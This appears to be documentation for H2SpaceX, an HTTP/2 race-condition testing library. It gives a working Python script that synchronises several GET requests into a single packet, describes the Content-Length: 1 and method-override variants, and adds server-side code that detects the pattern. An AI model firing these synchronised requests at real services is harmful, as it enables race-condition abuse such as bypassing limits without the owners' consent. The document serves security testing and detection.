GET SPA Methods
Although a Single Packet Attack on GET requests does not work the same way as on POST requests, there are some methods which can help you exploit it in some cases.
Remove END_STREAM flag and send the last bytes together.
from h2spacex import H2OnTlsConnection
from time import sleep
from h2spacex import h2_frames

# change this host name to the newly generated one
host = 'example.com'

h2_conn = H2OnTlsConnection(
    hostname=host,
    port_number=443
)

h2_conn.setup_connection()

headers = """HEADERS
...
"""

try_num = 3

stream_ids_list = h2_conn.generate_stream_ids(number_of_streams=try_num)

all_headers_frames = []  # all headers frames + data frames which do not contain the last byte
all_data_frames = []  # all data frames which contain the last byte

for i in range(0, try_num):
    header_frames_without_last_byte, last_data_frame_with_last_byte = h2_conn.create_single_packet_http2_get_request_frames(  # noqa: E501
        method='GET',
        headers_string=headers,
        scheme='https',
        stream_id=stream_ids_list[i],
        authority=host,
        path='/',
        body=None
    )

    all_headers_frames.append(header_frames_without_last_byte)
    all_data_frames.append(last_data_frame_with_last_byte)

# concatenate all headers bytes
temp_headers_bytes = b''
for h in all_headers_frames:
    temp_headers_bytes += bytes(h)

# concatenate all data frames which contain the last byte
temp_data_bytes = b''
for d in all_data_frames:
    temp_data_bytes += bytes(d)

# send the headers (everything except the final frames) first
h2_conn.send_bytes(temp_headers_bytes)

# wait some time
sleep(0.1)

# send ping frame to warm up connection
h2_conn.send_ping_frame()

# send remaining data frames
h2_conn.send_bytes(temp_data_bytes)

# read and parse the responses of all streams
resp = h2_conn.read_response_from_socket(_timeout=3)
frame_parser = h2_frames.FrameParser(h2_connection=h2_conn)
frame_parser.add_frames(resp)
frame_parser.show_response_of_sent_requests()

sleep(3)
h2_conn.close_connection()
Some servers wait when they see a Content-Length header in a GET request, so you can use this method to carry out the attack.
Send multiple requests like this:
.
content-length: 1
OTHER_HEADERS
.
And send a DATA frame containing 1 byte for each request in a single packet.
Send a POST request with the x-method-override or x-http-method-override header and send 1 byte in a DATA frame for each request.
:method: POST
OTHER_HEADERS
x-method-override: GET
+
DATA_FRAME
.
Send a POST request with the x-method-override or x-http-method-override URL parameter and send 1 byte in a DATA frame for each request.
:method: POST
:path: /path?x-method-override=GET
OTHER_HEADERS
+
DATA_FRAME
.
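From the server side, all of the methods above look the same at the frame level: several streams are opened by HEADERS frames without END_STREAM and are later finished together by DATA frames of at most one byte. The following is an added detection example, not part of H2SpaceX; the function names, the threshold and the sample capture are assumptions, each read is assumed to hold whole frames, and DATA padding is ignored.

```python
DATA, HEADERS, PING = 0x0, 0x1, 0x6      # frame types (RFC 9113)
END_STREAM, END_HEADERS = 0x1, 0x4       # frame flags

def frame(ftype, flags, stream_id, payload=b""):
    """Serialize one frame: 24-bit length, type, flags, 31-bit stream id, payload."""
    return (len(payload).to_bytes(3, "big") + bytes([ftype, flags])
            + (stream_id & 0x7FFFFFFF).to_bytes(4, "big") + payload)

def parse_frames(buf):
    """Yield (type, flags, stream_id, payload) for every complete frame in buf."""
    pos = 0
    while pos + 9 <= len(buf):
        length = int.from_bytes(buf[pos:pos + 3], "big")
        ftype, flags = buf[pos + 3], buf[pos + 4]
        sid = int.from_bytes(buf[pos + 5:pos + 9], "big") & 0x7FFFFFFF
        end = pos + 9 + length
        if end > len(buf):
            break                        # truncated frame: stop, do not guess
        yield ftype, flags, sid, buf[pos + 9:end]
        pos = end

def find_synchronized_closes(reads, threshold=3):
    """Return [(read_index, [stream_ids])] for reads in which at least
    `threshold` streams, opened by HEADERS without END_STREAM, are
    finished by a DATA frame of at most one byte."""
    pending, hits = set(), []
    for idx, buf in enumerate(reads):
        closed = []
        for ftype, flags, sid, payload in parse_frames(buf):
            if ftype == HEADERS and not flags & END_STREAM:
                pending.add(sid)         # request left open, body expected
            elif ftype == DATA and flags & END_STREAM and sid in pending:
                pending.discard(sid)
                if len(payload) <= 1:    # empty or 1-byte final frame
                    closed.append(sid)
        if len(closed) >= threshold:
            hits.append((idx, closed))
    return hits

# Constructed sample: one entry per socket read on a single connection.
HPACK_GET = b"\x82\x87\x84"              # :method GET, :scheme https, :path /
SAMPLE_READS = [
    b"".join(frame(HEADERS, END_HEADERS, s, HPACK_GET) for s in (1, 3, 5)),
    frame(PING, 0, 0, b"\x00" * 8)
    + frame(HEADERS, END_HEADERS | END_STREAM, 7, HPACK_GET),  # ordinary GET
    b"".join(frame(DATA, END_STREAM, s) for s in (1, 3, 5)),
]

if __name__ == "__main__":
    print(find_synchronized_closes(SAMPLE_READS))
```

The ordinary GET on stream 7 ends its stream in the HEADERS frame itself, so it never enters the pending set and is not reported.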
I also got some ideas from a previously developed library, h2tinker.
Finally, thanks again to James Kettle for directly helping and pointing out some other techniques.
- Single Packet Attack - POST &...
  - implement
- Single Packet Attack - GET
  - Remove END_STREAM flag
  - Content-Length: 1 Method
  - POST Request with x-override-method: GET header
- Response Parsing
  - implement
  - implement threaded response parser
- Body Decompression
  - gzip
  - br
  - deflate
- Proxy
  - Socks5 Proxy